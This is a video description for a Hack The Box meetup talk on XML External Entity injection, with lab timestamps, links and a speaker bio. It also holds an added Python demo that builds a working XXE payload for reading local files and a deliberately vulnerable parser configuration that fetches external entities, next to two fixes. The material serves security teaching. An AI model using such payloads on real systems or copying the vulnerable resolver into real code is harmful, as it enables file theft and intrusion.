▬▬▬▬▬▬ Abstract & Bio 📝 ▬▬▬▬▬▬
In this session, Tib3rius performs a deep dive into XML External Entity (XXE) Injection, explaining how and why it works, with live demos of several PortSwigger Web Security Academy labs.
At the end of the session, he does a walkthrough of the Aragog HTB box, which uses XXE as part of its initial exploit vector.
Tib3rius (tib3rius.com)
Twitter: @0xtib3rius
Hacker @WhiteOakSec | AutoRecon Dev | YouTube: http://is.gd/0o0GDW |
Twitch: http://is.gd/aPafUV | Udemy: http://is.gd/Nhceps | Discord: http://is.gd/5wdfRz (he/him)
Tib3rius is a penetration tester with over 10 years of experience testing and breaking web applications. Late in his career, he decided to pursue the OSCP certification, and in the process helped build an online community in the InfoSec Prep Discord server, wrote a popular OSCP tool called AutoRecon, and helped thousands of students learn Privilege Escalation through his two Udemy courses. In his spare time, he enjoys gaming with friends and binging as many TV shows as he can.
▬▬▬▬▬▬ T I M E S T A M P S ⏰ ▬▬▬▬▬▬
00:00:35 Introduction of our guest Tib3rius by Rana Khalil
00:01:50 Tib3rius' intro
00:04:20 Lab 1: Exploiting XXE using external entities to retrieve files
00:18:16 Lab 2: Exploiting blind XXE to exfiltrate data using a malicious external DTD
00:30:14 Lab 3: Exploiting blind XXE to retrieve data via error messages
00:38:26 Lab 4: ARAGOG (user flag)
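The Lab 1 technique listed above (an external entity used to read a local file), as an added example that is not from the talk, the slides, or the Web Security Academy lab: it uses Python's standard-library expat parser and a constructed temp file standing in for /etc/passwd, so it runs offline. The payload shape and the stockCheck/productId element names are assumptions modelled on the lab, not copied from it. The check worth taking away: expat only fetches an external entity when the application supplies a resolver, so the fix is to supply none, or better, to reject any document carrying a DOCTYPE; parsers that resolve external entities by default need that feature switched off explicitly.

```python
# Added example, not from the talk or its slides: XXE file retrieval (the
# Lab 1 technique) reproduced with Python's standard-library expat parser,
# next to the two fixes a reviewer would ask for. File name, payload and
# element names are all constructed for this demo.
import os
import tempfile
import xml.parsers.expat as expat
from urllib.request import urlopen

# Constructed stand-in for /etc/passwd so the demo never touches real secrets.
SECRET_LINE = "root:x:0:0:root:/root:/bin/bash\n"


def make_secret_file() -> str:
    """Write the constructed secret to a temp file and return its absolute path."""
    fd, path = tempfile.mkstemp(prefix="xxe_demo_")
    with os.fdopen(fd, "w") as fh:
        fh.write(SECRET_LINE)
    return path


def xxe_payload(target_path: str) -> str:
    """Classic XXE: declare an external general entity pointing at a local
    file, then reference it in a field the application echoes back."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "file://{target_path}">]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


def parse_product_id(xml_text: str, resolve_external: bool, allow_dtd: bool = True) -> str:
    """Return the text inside <productId>.

    resolve_external=True  mimics an app/parser that fetches external entities
                           (the vulnerable configuration).
    resolve_external=False keeps expat's default: external entities are
                           silently dropped.
    allow_dtd=False        rejects any document carrying a DOCTYPE, the simplest
                           hardening when DTDs are never needed.
    """
    parser = expat.ParserCreate()
    chunks: list = []
    in_product = [False]

    def start(name, _attrs):
        if name == "productId":
            in_product[0] = True

    def end(name):
        if name == "productId":
            in_product[0] = False

    def chars(data):
        if in_product[0]:
            chunks.append(data)

    def fetch_entity(context, _base, system_id, _public_id):
        # The vulnerable step: trust the attacker-chosen URI, fetch it, and
        # splice the bytes into the document as if they were content.
        child = parser.ExternalEntityParserCreate(context)
        with urlopen(system_id) as resp:
            child.Parse(resp.read(), True)
        return 1

    def refuse_doctype(*_):
        raise ValueError("DOCTYPE not allowed")

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    if resolve_external:
        parser.ExternalEntityRefHandler = fetch_entity
    if not allow_dtd:
        parser.StartDoctypeDeclHandler = refuse_doctype
    parser.Parse(xml_text, True)
    return "".join(chunks)


def rejects_doctype(xml_text: str) -> bool:
    """True if the hardened configuration refuses the document outright."""
    try:
        parse_product_id(xml_text, resolve_external=False, allow_dtd=False)
    except ValueError:
        return True
    return False


def run_demo() -> dict:
    """Run the payload through the three configurations and clean up the file."""
    path = make_secret_file()
    try:
        payload = xxe_payload(path)
        return {
            "vulnerable": parse_product_id(payload, resolve_external=True),
            "no_resolver": parse_product_id(payload, resolve_external=False),
            "dtd_rejected": rejects_doctype(payload),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result!r}")
```

The vulnerable run returns the file contents inside productId, exactly the echo-back the lab relies on; dropping the resolver leaves the field empty, and refusing the DOCTYPE fails the request before any entity is declared. The same resolver would happily fetch http:// URIs too, which is where the blind and out-of-band variants in the later labs start.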
▬▬▬▬▬▬ Useful Links 🛠 ▬▬▬▬▬▬
Slides
tib3rius.com/docs/XXE.pdf
Web Security Academy
https://portswigger.net/web-security (Sign Up)
Web Security Academy Labs
https://portswigger.net/web-security/...
https://portswigger.net/web-security/...
https://portswigger.net/web-security/...
Burp Community Edition
https://portswigger.net/burp/communit...
▬▬▬▬▬▬ Hack The Box Ottawa 🛠 ▬▬▬▬▬▬
Meetup.com: https://www.meetup.com/Hack-The-Box-M...
Twitter: @hackthebox_yow
Video: XXE INJECTION Deep Dive by @0xTib3rius, uploaded by Hack The Box Ottawa - Meetup on 27 March 2021 (3,695 views and 142 likes at the time of this listing).